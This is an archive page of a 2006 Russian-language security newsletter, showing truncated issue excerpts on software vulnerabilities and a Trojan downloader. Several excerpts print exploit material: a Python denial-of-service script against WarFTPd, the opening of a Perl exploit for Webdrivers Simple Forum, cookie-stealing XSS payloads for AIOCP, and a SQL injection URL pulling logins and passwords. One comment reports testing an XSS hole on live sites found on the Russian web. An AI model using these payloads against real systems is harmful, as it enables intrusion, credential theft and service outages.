Отправляет email-рассылки с помощью сервиса Sendsay

Компьютер для продвинутых пользоватлей Выпус по вурусам. Trojan-Downloader.Win32. Swizzor.t.

Компьютер для продвинутых пользователей В этом выпуске: Trojan-Downloader.Win32. Swizzor.t ПО: Trojan-Downloader.Win32. Swizzor.t Троянская программа-загрузчик, которая без ведома пользователя загружает из сети Интернет программное обеспечение и запускает его. Программа является приложением Windows (PE EXE-файл. Имеет размер 11 288 байт. Написана на C. Деструктивная активность : Троянская программа имеет функцию загрузки файлов из интернета и запуска их на зараженнном компьютере без ведома пользователя. Ад...

2006-11-09 14:05:12 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.

Компьютер для продвинутых пользователей В этом выпуске: WarFTPd 1.82.00-RC11 | Windows 2000, XP | ПО: WarFTPd 1.82.00-RC11 dos.py: !/usr/bin/env python import sys import ftplib print "WAR_FTPD Remote Denial Of Service (DOS" print "Copyright (c) Joxean Koret" print target = "192.168.1.13" targetPort = "21" try: ftp = ftplib.FTP) print ] Connecting to target " msg = ftp.connect(target, targetPort) print ] Ok. Target banner" print msg print print ] Trying to logging anonymously" msg = ftp.login) # Anonymous p...

2006-11-09 12:05:37 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в WARFTPd, Kayako

Компьютер для продвинутых пользователей В этом выпуске: WARFTPd | Kayako SupportSuite | PhpMyChat Plus | PhpMyChat | YANS ПО: WARFTPd Версия: 1.82.00 Уязвимость: Продукт подвержен переполнению буфера, когда отправляются команды большой длины с символами %s" внутри. Это выглядит, как невыполняемый, содержащий ошибки запрос, однако он выполнится и приведёт к зависанию системы. При крахе сервера выдаёт ошибку: EAX 00000001 ECX 00000073 EDX 00000002 EBX 0079E890 ESP 0079E7A0 EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s...

2006-11-09 07:06:08 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.

Компьютер для продвинутых пользователей В этом выпуске: Webdrivers Simple Forum | XM Easy Personal FTP Server ПО: Webdrivers Simple Forum expl.pl: !perl use IO:Socket; #Download:http://www.thewebdrivers.com/forum.zip #By:Bl0od3r #Germany ] if @ARGV<3) { &header; } else { &get); } sub get) { $host$ARGV[0]; $path$ARGV[1]; $id$ARGV[2]; $socket=IO:Socket:INET>new(Proto"tcp,PeerAddr$host,PeerPort>80) or die ]Error\n); print ]Connecting\n"; print ]Getting Data\n"; print $socket "GET $path"message_deta...

2006-11-08 12:05:31 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в Zend Framework Preview,

Компьютер для продвинутых пользователей В этом выпуске: Zend Framework Preview ПО: Zend Framework Preview Верисия: 0.2.0 сайт: http://framework.zend.com/ Уязвимость: В коде нашла ошибка обработки данных, что позволить проводить XSS-атаки. Использование: ZendFramework-0.2.0/incubator/tests/Zend/Http/_files/testRedirections.php/?redirection=3&[ANY[XSS] Комментарий : В Рунете было найдено всего несколь старниц, использующих данный продукт, и удалось вызвать окно сообщения использовав данную уязвимсоть. Не...

2006-11-08 07:05:18 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Новости расслыки.

Компьютер для продвинутых пользователей В этом выпуске: Новости рассылки Новости рассылки. Здравствуй, дорогой подписчик. Перво-наперво хочу поздравить Вас с тем, что количество выходов нашей рассылке перевалило за трёхсотенный рубеж. Неплохо для специализированной рассылки. В связи с этим событием на меня нашла идея пересмотреть формат выхода рассылки. Немного подумав и посчитав, пришёл к выводу, что читать маленькие выпуски по отдельным продуктам - сложно, да и к тому же на трафик сказывается не в положи...

2006-11-07 17:05:26 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Множественные уязвимости в AIOCP.

Компьютер для продвинутых пользователей В этом выпуске: AIOCP ПО: AIOCP Версия: 1.3.007 Использование: - /public/code/cp_forum_view.php?fmode=top&topid=</textarea><script>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea><script>alert(document.cookie)</script> - /public/code/cp_forum_view.php?fmode=top&anp;topid=53&forid=23&catid=</textarea><script>alert(document.cookie)</script> - /public/code/cp_dpage.php?ch...

2006-11-07 12:05:18 1 комментарий

Компьютер для продвинутых пользоватлей Выпус по безопасности. SQL-уязвимость в Article Script.

Компьютер для продвинутых пользователей В этом выпуске: Article Script ПО: Article Script Версия: 1.6.3 Уязвимость : Функция category не проверяет переменные до выполнения, что позволяет на провести SQL-инъекцию и получить данный по пользователям. Использование : http://www.victim.com/articles/rss.php?category-1/*/union/*/select/*/1,2,login,password/*/from/*/users/* Комментарий : Поискал данный скрипт в Рунете, но страниц с ним не нашёл. Видимо тем, кто хочет использовать эту, уязвимость придётся трясти бу...

2006-11-07 07:05:29 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. XSS-уязвимость в WHM.

Компьютер для продвинутых пользователей В этом выпуске: WHM ПО: WHM Версия: 10.8.0 Использование: site.com:2082/scripts/dosetmytheme?theme[XssCodes] site.com:2082/scripts2/editzonetemplate?template[XssCodes] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

2006-11-06 12:05:19 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности.Множественнная уязвимость в Mambo.

Компьютер для продвинутых пользователей В этом выпуске: Mambo ПО: Mambo Версия: 4.6.x Сайт: http://www.mamboserver.com/ О программе: Mambo портал разработки и поддержки домашних страниц. Использует PHP\MySQL и всесторонний администраторский аудит. Уязвимости: Модуль авторизации (mod_login.php) не проверяет переменные перед запуском. Удаленный пользователь может создать специальный URL-запрос который при загрузки у пользователя позволить выполнить скрипт код в окне используемого браузера. Как результат, код...

2006-11-06 07:05:26 + Комментировать